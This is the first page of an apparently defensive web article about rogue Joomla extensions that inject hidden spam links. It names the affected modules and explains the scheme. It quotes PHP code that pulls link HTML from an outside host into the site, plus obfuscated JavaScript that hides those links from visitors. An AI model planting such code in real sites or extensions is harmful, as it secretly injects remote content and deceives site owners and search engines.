Spotting Spam Code in Malicious Extensions

Article Index

Page 1 of 3

Spam Alert

Have you found a lot of hidden spammy links on your Joomla site and don't understand how they got there? Here is a possible explanation.

Recently a case of spamming involving rogue Joomla extensions came to light. The extensions involved were several popular free modules and plugins listed in the Joomla extensions directory, mostly slideshows, twitter widgets and similar extensions. Some examples were:

 

Autson Skitter Slideshow (mod_AutsonSlideShow)
Share This for Joomla! (mod_JoomlaShare This)
VirtueMart Advanced Search (mod_virtuemart_advsearch)
AddThis For Joomla (mod_AddThisForJoomla)
Plimun Nivo Slider (mod_PlimunNivoSlider)

You can find out more information about this (and a list of other extensions that may be involved) in the original Joomla forum post that brought this to light: http://forum.joomla.org/viewtopic.php?t=795946.
The scam works by including code similar to the following (usually in a template file):-

     Example 1
     <?php 
     $credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
     echo $credit;
     ?>

What this does is to fetch the output of a script on the developer's site, which generates the links, and outputs them on your site. However, unless you view the page source of your site you will not see them due to another piece of code that will look something like this:-

     Example 2
     <script language="JavaScript">
     function dnnViewState()
     {
     var a=0,m,v,t,z,x=new  Array('9091968376','888791814987883421333333338896','778787',
     '949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
     t=z='';
     for(v=0;v<m.length;){t+=m.charAt(v++);
     if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
     t='';}}x[l-a]=z;}document.write('<'+x[0]+'  '+x[4]+'>.''{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
     </script>

Although this code looks rather mysterious, what it actually does is to insert a css style tag into your page which makes the links invisible. It is done this way (presumably) in order to hide its function from Google. To Googlebot these will look like normal links, and will pass pagerank, which is what the spammer wants.

It is likely that the spammer was selling the opportunity to embed these links in unsuspecting sites. If you Google 'buy pagerank 9 links' then you will find a long list of sites offering to sell you links, which is ironic really because this is a practice that Google strongly discourages. It is unlikely that many of these links could be obtained legitimately from high quality sites, much more likely they are obtained through methods such as the one we are discussing.